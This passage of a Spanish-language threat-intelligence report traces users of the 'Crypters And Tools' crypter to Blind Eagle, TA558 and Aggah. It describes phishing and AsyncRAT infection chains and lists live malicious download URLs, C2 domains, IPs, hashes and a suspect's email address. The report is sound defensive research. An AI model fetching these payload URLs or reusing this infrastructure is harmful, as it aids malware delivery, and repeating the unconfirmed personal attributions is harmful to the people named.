  • historial del navegador,
  • historial de descargas,
  • sitios web más visitados,
  • datos de sesión de aplicaciones como Telegram y Skype,
  • redes Wi-Fi almacenadas con sus nombres y contraseñas.

Estos datos permitieron atribuir con alta confianza que bukky101 reside en Nigeria, conclusión respaldada tanto por la geolocalización de IP como por el uso de servicios locales de Internet, concretamente de Airtel Nigeria.

Además, descubrimos que este actor participaba en campañas masivas de phishing con alcance global. Para febrero de 2025, bukky101 había enviado más de 6.160 correos electrónicos de phishing únicos. A continuación, se presentan algunos ejemplos de líneas de asunto que ilustran la variedad temática de las campañas de ingeniería social:

  • DETAIL OF H Sale order # 128578 (PAKISTAN.PACKAGES)
  • Position for the Head of IT / Manager IT
  • Прайс лист на продукцию
  • محاكم راس الخيمة إعلان:3100134384
  • [Gabrini Cosmetics]: New order #80464
  • Re: Proposal of Stall Design and Fabrication for AAHAR Expo 04-08 March 2025 (New delhi)
  • ✅ Нов термин за работилница: Последни измени на Законот за јавни набавки, актуелни теми и предизвици
  • Atașez și poze cu , coletul ce mi-a ajuns , și factura lângă
  • Factura fiscala cutii carton_22.11.2024
  • Dit verandert er in de tarieven en voorwaarden op ons platform
  • REQUEST FOR PROPOSAL FOR WORLD VISION ZIMBABWE
Figure 28. Example of a phishing email sent by bukky101
Figura 28. Ejemplo de correo de phishing enviado por bukky101

La mayoría de estos correos contenían archivos HTML con campos de inicio de sesión pre-rellenados con la dirección de correo del objetivo. Al introducir la contraseña, se mostraba un mensaje de error indicando que era inválida, pero en ese mismo instante las credenciales eran exfiltradas mediante una solicitud enviada a un bot de Telegram —operado, en este caso, por otro usuario: @Gfcafmin.

Figure 29. HTML document containing a pre-filled login field tied to bukky101
Figura 29. Documento HTML con el login vinculado a bukky101

También identificamos un directorio abierto asociado a bukky101, alojado en la IP 37.49.228.234, el cual fue mencionado en una publicación de la red social X.

Figure 30. Open directory hosted at 37.49.228.234 associated with bukky101
Figura 30. Directorio abierto en 37.49.228.234 asociado a bukky101

Durante la investigación, descubrimos que bukky101 colaboraba con otros individuos del cibercrimen. Uno de sus socios operaba el servidor 185.38.142.224, utilizado para distribuir campañas de phishing a nivel mundial. Según nuestros datos, desde esa dirección IP se enviaron al menos 60.300 correos en un solo día.

A continuación, un ejemplo de uno de esos correos:

Figure 31. Malicious email sent by one of bukky101’s associates
Figura 31. Correo malicioso enviado por un colaborador de bukky101

Al hacer clic en el enlace, se iniciaba la descarga de un archivo JavaScript desde:

  • https://21ninety.info/file/Purchase-Order.js

Este script obtenía información adicional desde paste.ee y luego realizaba una solicitud a través de la API de Crypters And Tools para descargar la siguiente carga útil:

  • 3005.filemail.com/api/file/get?filekey=

Los datos extraídos finalmente se enviaban a un bot de Telegram operado por el usuario @Mastersolution2 ("To The World Master Solution").

Cabe recordar que investigaciones previas ya habían señalado vínculos entre la agrupación Aggah y actores nigerianos que reutilizaban su arsenal. Esta observación es coherente, al menos parcialmente, con los hallazgos descritos anteriormente.

5.2. Blind Eagle: deadpoolstart2025 y ABBAS

Durante nuestra investigación sobre el grupo Blind Eagle, identificamos un servidor con dirección IP 181.71.217.114, perteneciente a un ASN bien conocido asociado a esta agrupación: Colombia Movil (AS27831). La mayoría de los dominios vinculados a esta dirección IP seguían el patrón strekhostYYYY, como por ejemplo: strekhost2024[.]duckdns[.]org. Según un repositorio público en GitHub, estos dominios fueron atribuidos a Blind Eagle por investigadores de Zscaler.

Además de los dominios con el patrón strekhost, identificamos otros adicionales:

  • deadpoolstart2025.duckdns.org
  • deadpoolstart2026.duckdns.org
  • deadpoolstart2051.duckdns.org

Asimismo, se localizaron dominios adicionales con el nombre deadpoolstart y diferentes años, alojados en otra IP (179.14.11.213), como por ejemplo: deadpoolstart2035.duckdns.org.

Resultó que la base de datos de Crypters And Tools contenía un usuario registrado con el alias deadpoolstart2025.

Figure 32. Information from the database about the user Deadpoolstart2025
Figura 32. Información de la base de datos sobre el usuario deadpoolstart2025

Una de sus campañas se desarrolló de la siguiente manera:

El 14 de noviembre de 2024, el atacante envió un correo malicioso suplantando la identidad de un fabricante farmacéutico colombiano.

Figure 33. Email sent by the attacker
Figura 33. Correo enviado por el atacante

El enlace conducía a un archivo de Google Drive que alojaba un archivo comprimido con contraseña llamado: FOLIO_INCONSISTENCIA_REVISION_FISCAL_CARTERA_DETALLES_DETALLES_AMPLIADOS_CODIGO_VERIFICACION_ad851874148487ff17817ca2545434453154617ff5464484171525541748594ca6544981894ff11258749565284_XML.rar (SHA-256: 5fe3f4e4ab026fbcd0b595c7b35eb3b3997cae0fc8b92728b0bd556a3ec3c092). La contraseña se incluía directamente en el cuerpo del mensaje. Dentro del archivo comprimido se encontraba un fichero VBS (SHA-256: 937fcba2f15c795a209032a36a921fe9f53ea7a47e7295573cd1c0ebb8d9d241, que al ejecutarse, se añadía al inicio automático del sistema y descargaba un script malicioso desde paste.ee.

El script descargado contenía un comando PowerShell codificado en Base64, en el cual figuraba la ya conocida variable $codigo. Una vez iniciado, el script obtenía la siguiente carga útil a través de la API de Crypters And Tools, alojada en 1017.filemail.com, y además se conectaba a files.catbox.moe. El resultado final de esta cadena de infección fue la ejecución de AsyncRAT, con un servidor C2 que ya no pertenecía a la infraestructura del crypter, sino directamente al atacante — deadpoolstart2025.duckdns.org (181.71.217.114).

Identificamos múltiples campañas vinculadas a este usuario, con un pico de actividad entre noviembre de 2024 y febrero de 2025. En todas las campañas documentadas, se utilizó AsyncRAT. Un detalle particularmente llamativo fue el mutex de AsyncRAT utilizado en estos ataques:

  • zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzNUEVOHOSTMALDITASEA

Durante el análisis también identificamos un servidor de Crypters And Tools utilizado para interactuar con el crypter mediante su API. En uno de los registros, se observó una solicitud proveniente de un usuario con el alias ABBAS:

  • http://91.92.254.29/Users_API/ABBAS/file_odpxh4oq.2bf.txtn

Al examinar con más detalle la cadena de ataque, se evidenciaron claras correlaciones con las operaciones de Blind Eagle. Por ejemplo, se emplearon direcciones IP como 191.93.113.10 y 152.201.184.91, ambas pertenecientes a proveedores colombianos frecuentemente utilizados por el grupo. Asimismo, la estructura del ataque coincidía con las campañas descritas en un informe reciente de Check Point.

El usuario ABBAS figuraba en todas las versiones de la base de datos de Crypters And Tools que analizamos durante el curso de la investigación.

Figure 34.1. Information from the database about ABBAS user
Figura 34.1. Información de la base de datos sobre el usuario ABBAS
Figure 34.2. Information from the database about ABBAS user
Figura 34.2. Información de la base de datos sobre el usuario ABBAS

En conclusión, a diferencia de bukky101, cuya atribución a un grupo específico no pudo establecerse con certeza, las actividades de deadpoolstart2025 y ABBAS coinciden completamente con los TTP conocidos de Blind Eagle: desde el idioma utilizado hasta la infraestructura de servidores y el perfil de las víctimas. Por tanto, evaluamos con alto grado de confianza que estos usuarios o bien forman parte de Blind Eagle o mantienen una colaboración directa con el grupo.

5.3. TA558: Brainiac, syscore y negrocock

Como ya se demostró en el caso del usuario ABBAS, algunos usuarios de Crypters And Tools fueron identificados durante el análisis de las actividades de grupos específicos, en este caso Blind Eagle y TA558.

Dos de estos usuarios — BrainiacMAX y syscore — fueron detectados interactuando con la infraestructura del crypter a través de su API:

  • http://91.92.254.14/Users_API/BrainiacMAX/file_ksg3fckt.hot.txt
  • http://66.70.160.254/Users_API/syscore/file_ikvt3ei1.mgv.txt

En el capítulo "Características de TA558 y sus diferencias con Blind Eagle", describimos rasgos distintivos que permiten identificar a TA558. En este caso, la cadena de ataque asociada a BrainiacMAX es un ejemplo clásico de actividad de TA558, que incluye infraestructura alojada en AS-COLOCROSSING y nombres de archivos con patrones muy particulares:

  • http://192.3.216.148/uh.ee.uh.ee.uhuheee.doc
  • http://192.3.216.148/datingloverstartingAgain.vbs

Además, los datos exfiltrados fueron enviados mediante un servidor SMTP legítimo pero comprometido en Rumanía — una técnica alineada con el comportamiento conocido del grupo TA558 y observada desde nuestro primer artículo.

Se detectó un patrón similar en el caso del usuario syscore. En su ataque se utilizó un documento Excel con un nombre muy característico de TA558: Product Inquiry466789.xls (SHA-256: 3a7d034a793a0f03dc9930446aebf326320140584eeb171909962ec7123f9e5e). Al ejecutarse, el archivo descargaba una plantilla RTF desde:

  • http://51.81.235.253/66166/hd/hd.d.d.d.dddd.doC

Posteriormente, aparecía un archivo VBS — también con un nombre que sigue la convención típica del grupo:

  • http://51.81.235.253/66166/catcallingfemalecattogiveflowersgreat.gif

Ambos usuarios estaban presentes en la base de datos de Crypters And Tools.

Figure 35.1. Information from the database about the user Brainiac
Figura 35.1. Información de la base de datos sobre el usuario Brainiac
Figure 35.2. Information from the database about the user syscore
Figura 35.2. Información de la base de datos sobre el usuario syscore

Al igual que en los casos de deadpoolstart2025 y ABBAS, podemos afirmar con confianza que estos usuarios — BrainiacMAX y syscore — están vinculados a un grupo documentado públicamente, en este caso TA558.

También se identificó a otro usuario, negrocock, de forma similar:

  • http://94.156.65.247/Users_API/negrocock/file_mq5uppna.ldt.txt

Sus ataques presentaban patrones típicos de TA558:

  • http://198.46.178.144/morningfiledatinglover.vbs
  • http://198.46.178.144/eveningfiledatinglover.vbs

5.4. KareemHacker

Otro usuario presente en la base de datos de Crypters And Tools es KareemHacker:

Figure 36. Information from the database about the user KareemHacker
Figura 36. Información de la base de datos sobre el usuario KareemHacker

Kareem.Hacker es un hacker, presumiblemente originario de Marruecos, al que se le atribuyen al menos 538 ataques de desfiguración (defacement) de sitios web según mirror-h (un portal que recopila este tipo de datos), y hasta 1.671 según zone-h. Este usuario mantiene también una cuenta en GitHub, un perfil en X (anteriormente Twitter) y varios canales en YouTube, uno de los cuales muestra vídeos donde escribe letras en árabe y muestra sitios web que ha desfigurado. Su cuenta de X se encuentra actualmente bloqueada por violaciones a las políticas, tras denuncias de usuarios cuyos sitios fueron comprometidos.

Figure 37. GitHub account: Kareem.Hacker
Figura 37. Cuenta de GitHub: Kareem.Hacker

Cabe destacar que Kareem Hacker podría ser un nombre y apellido legítimo aunque poco común. Por el momento, no es posible confirmar con certeza que el usuario de Crypters And Tools y el defacer conocido como Kareem.Hacker sean la misma persona.

5.5. HeadMaster

Durante nuestro análisis sobre Crypters And Tools, analizamos diversos mercados, sitios web y otras plataformas donde se comercializa este crypter. Uno de estos portales es nitrosoftwares[.]com, que ofrece una amplia gama de herramientas como exploits, crypters, loggers, crypto clippers, entre otros.

Figure 38. Website for selling various software
Figura 38. Sitio web para la venta de herramientas diversas
Figure 39. Contacts on the website
Figura 39. Contactos publicados en el sitio

En la base de datos de Crypters And Tools encontramos al siguiente usuario:

Figure 40. Information from the database about the user headmaster
Figura 40. Información de la base de datos sobre el usuario headmaster

Destaca la conexión entre la cuenta de Discord "HeadMaster" y el correo electrónico jkbest22@gmail.com (Figura 39). En filtraciones públicas de datos, se encontraron varias contraseñas asociadas a esta dirección de correo, una de las cuales coincide con la utilizada por el usuario headmaster (la contraseña se oculta en la imagen).

Esto sugiere que el actor reutilizó las mismas credenciales en múltiples cuentas de correo y servicios, incluyendo el mercado mencionado para la venta de software malicioso. Además, varios buzones del atacante se vieron comprometidos en filtraciones que expusieron no solo contraseñas y nombres de usuario, sino también direcciones IP. Todas estas direcciones estaban geolocalizadas en Pakistán, país que se considera origen probable del grupo Aggah. No obstante, hasta el momento no ha sido posible establecer un vínculo directo y concluyente entre HeadMaster y Aggah.

5.6. Otros usuarios

Otro usuario identificado es HURRICANE.

Figure 41. Information from the database about the user HURRICANE
Figura 41. Información de la base de datos sobre el usuario HURRICANE

Este usuario, al igual que muchos otros, fue identificado a través de solicitudes API realizadas hacia la infraestructura de Crypters And Tools durante sus campañas:

  • http://94.156.65.247/Users_API/HURRICANE/file_lfhsdrdp.5db.txt
Figure 42. Example of a letter from Crypters And Tools user — HURRICANE
Figura 42. Ejemplo de un correo enviado por el usuario HURRICANE (Crypters And Tools)

Los nombres de los documentos utilizados por este actor eran similares a los típicamente empleados por el grupo TA558, aunque las etapas siguientes en la cadena de ataque diferían considerablemente.

Adicionalmente, se identificaron varias URL más asociadas a usuarios de Crypters And Tools, aunque por el momento no se dispone de información adicional sobre estos actores:

  • http://91.92.254.14/Users_API/Just1ne/file_1hsfgryb.he3.txt
  • http://91.92.254.14/Users_API/gavrels/file_ycm2xqby.heg.txty
  • https://91.92.254.29/Users_API/Ws/file_wuey5ekz.pcq.txt

6. Conclusión

Los investigadores suelen citar la infraestructura de Crypters And Tools como indicadores vinculados a determinados grupos de amenazas. Sin embargo, esta atribución no siempre es precisa. En la primera parte de nuestro análisis, detallamos la arquitectura del crypter y proporcionamos un conjunto de indicadores, tanto de red como de archivos, asociados a Crypters And Tools. En esta segunda parte, mostramos qué grupos de amenazas han hecho uso del crypter, así como las conexiones existentes entre ellos.

Asimismo, analizamos la actividad de varios usuarios individuales de Crypters And Tools y pudimos atribuir con alto grado de certeza a algunos de ellos a grupos conocidos como Blind Eagle y TA558. Además, identificamos otros actores relevantes, como bukky101, quien, junto con otro usuario, envió al menos 60.300 correos electrónicos de phishing en un solo día, dirigidos a múltiples regiones.

Además, las campañas recientes atribuidas a Aggah demuestran que, pese a un aparente período de inactividad en 2022, el grupo ha mantenido su operativa durante 2024 y 2025. Técnicas fundamentales como el uso de infraestructura serverless (por ejemplo, Blogspot, Bitbucket) siguen siendo una parte central de sus cadenas de infección. Al mismo tiempo, hemos observado la adopción de nuevas cargas maliciosas, como Rhadamanthys y XWorm.

7. Lista de artículos que mencionan los grupos y el crypter

Aggah

  • https://malware.news/t/unknown-ttps-of-remcos-rat/80082
  • https://yoroi.company/research/serverless-infostealer-delivered-in-est-european-countries/
  • https://web.archive.org/web/20240106015245/https:/marcoramilli.com/2022/11/21/is-hagga-threat-actor-abusing-fsociety-framework/
  • https://ti.qianxin.com/blog/articles/Subgroup-of-Blind-Eagle-Analysis-of-Recent-Attack-Activities-from-Hagga-Group-EN/

TA558

  • https://www.metabaseq.com/threat/ta588/
  • https://www.forcepoint.com/blog/x-labs/url-shortener-microsoft-word-remcos-rat-trojan
  • https://cyble.com/blog/threat-actor-employs-powershell-backed-steganography-in-recent-spam-campaigns/
  • https://www.seqrite.com/blog/steganographic-campaign-distributing-malware/
  • https://www.trellix.com/blogs/research/unmasking-the-hidden-threat-inside-a-sophisticated-excel-based-attack-delivering-fileless-remcos-rat/
  • https://www.cyfirma.com/research/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/

Blind Eagle

  • https://blogs.blackberry.com/en/2023/02/blind-eagle-apt-c-36-targets-colombia
  • https://www.esentire.com/blog/blind-eagles-north-american-journey
  • https://mp.weixin.qq.com/s/DDCCjhBjUTa7Ia4Hggsa1A
  • https://any.run/cybersecurity-blog/steganography-in-malware-attacks/

PhantomControl

  • https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

Artículos que presentan Crypters And Tools sin atribución a ningún grupo

  • https://somedieyoungzz.github.io/posts/stego-camp/
  • https://asec.ahnlab.com/en/65111/
  • https://www.mcafee.com/blogs/other-blogs/mcafee-labs/agent-teslas-unique-approach-vbs-and-steganography-for-delivery-and-intrusion/
  • https://www.zscaler.com/blogs/security-research/threat-actors-exploit-cve-2017-11882-deliver-agent-tesla
  • https://www.fortinet.com/blog/threat-research/python-info-stealer-malicious-excel-document
  • https://blog.itochuci.co.jp/entry/2024/04/16/163014
  • https://medium.com/@b.magnezi/malware-analysis-xworm-80b3bbb072fb

Póngase en contacto

Complete el formulario y nuestros especialistas
se pongán en contacto con usted en breve